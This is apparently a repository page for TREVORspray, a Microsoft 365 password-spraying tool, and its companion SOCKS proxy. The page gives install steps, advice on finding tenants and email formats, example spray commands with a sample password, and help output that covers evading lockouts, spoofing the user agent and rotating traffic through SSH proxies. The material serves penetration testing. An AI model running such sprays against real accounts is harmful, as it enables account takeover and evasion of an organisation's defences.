Need help with TREVORspray?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

300 Stars 45 Forks GNU General Public License v3.0 24 Commits 0 Opened issues


A featureful round-robin SOCKS proxy and Python O365 sprayer based on MSOLSpray

Services available


Need anything else?

Contributors list


TREVORspray is a featureful Microsoft 365 password sprayer based on MSOLSpray

By @thetechr0mancer



  • Tells you the status of each account: if it exists, is locked, has MFA enabled, etc.
  • Automatic cancel/resume (remembers already-tried user/pass combos in
  • Round-robin proxy through multiple IPs using only vanilla
  • Automatic infinite reconnect/retry if a proxy goes down (or if you lose internet)
  • Spoofs
    to look like legitimate auth traffic
  • Logs everything to
  • Saves valid usernames to
  • Optional
    between request to bypass M$ lockout countermeasures


$ git clone
$ cd trevorspray
$ pip install -r requirements.txt

How To

  • First, get a list of emails for
    and perform a spray to see if the default configuration works. Usually it does.
  • If TREVORspray says the emails in your list don't exist, don't give up. Get the
    . The
    is the URL you'll be spraying against (with the
  • It may take some experimentation before you find the right combination of
    + email format.
    • For example, if you're attacking
      , it may not be as easy as spraying
      . You may find that Corp's parent company Evilcorp owns their Azure tenant, meaning that you need to spray against
      . Also, you may find that
      's internal domain
      is used instead of
    • So in the end, instead of spraying
      [email protected]
      , you're spraying
      [email protected]

Example: Perform recon against a domain (retrieves tenant info, autodiscover, mx records, etc.) --recon
    "token_endpoint": ""

Example: Spray against discovered "token_endpoint" URL -e emails.txt -p Fall2021! --url

Example: Spray with 5-second delay between requests -e [email protected] -p Fall2021! --delay 5

Example: Spray and round-robin between 3 IPs (the current IP is also used, unless
is specifiied) -e emails.txt -p Fall2021! --ssh [email protected] [email protected]

TREVORspray - Help:

$ ./ --help
usage: [-h] [-e EMAILS [EMAILS ...]] [-p PASSWORDS [PASSWORDS ...]] [-r DOMAIN [DOMAIN ...]] [-f] [-d DELAY] [-u URL] [-v] [-s [email protected] [[email protected] ...]] [-k KEY]
                      [-b BASE_PORT] [-n]

Execute password sprays against O365, optionally proxying the traffic through SSH hosts

optional arguments: -h, --help show this help message and exit -e EMAILS [EMAILS ...], --emails EMAILS [EMAILS ...] Emails(s) and/or file(s) filled with emails -p PASSWORDS [PASSWORDS ...], --passwords PASSWORDS [PASSWORDS ...] Password(s) that will be used to perform the password spray -r DOMAIN [DOMAIN ...], --recon DOMAIN [DOMAIN ...] Retrieves info related to authentication, email, Azure, Microsoft 365, etc. -f, --force Forces the spray to continue and not stop when multiple account lockouts are detected -d DELAY, --delay DELAY Sleep for this many seconds between requests -u URL, --url URL The URL to spray against (default is -v, --verbose Show which proxy is being used for each request -s [email protected] [[email protected] ...], --ssh [email protected] [[email protected] ...] Round-robin load-balance through these SSH hosts ([email protected]) NOTE: Current IP address is also used once per round -k KEY, --key KEY Use this SSH key when connecting to proxy hosts -b BASE_PORT, --base-port BASE_PORT Base listening port to use for SOCKS proxies -n, --no-current-ip Don't spray from the current IP, only use SSH proxies

Known Limitations:

  • Untested on Windows


TREVORproxy is a SOCKS proxy that round-robins requests through SSH hosts. Note that TREVORspray already has its own proxy feature (

), so this is for use with curl, Burpsuite, etc.

TREVORproxy - Help:

$ ./ --help
usage: [-h] [-p PORT] [-l LISTEN_ADDRESS] [-v] [-k KEY] [--base-port BASE_PORT] ssh_hosts [ssh_hosts ...]

Spawns a SOCKS server which round-robins requests through the specified SSH hosts

positional arguments: ssh_hosts Round-robin load-balance through these SSH hosts ([email protected])

optional arguments: -h, --help show this help message and exit -p PORT, --port PORT Port for SOCKS server to listen on (default: 1080) -l LISTEN_ADDRESS, --listen-address LISTEN_ADDRESS Listen address for SOCKS server (default: -v, --verbose Print extra debugging info -k KEY, --key KEY Use this SSH key when connecting to proxy hosts --base-port BASE_PORT Base listening port to use for SOCKS proxies

CREDIT WHERE CREDIT IS DUE - MANY THANKS TO: - @dafthack for writing MSOLSpray - @Mrtn9 for his Python port of MSOLSpray - @KnappySqwurl for being a splunk wizard and showing me how heckin loud I was being :)



We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.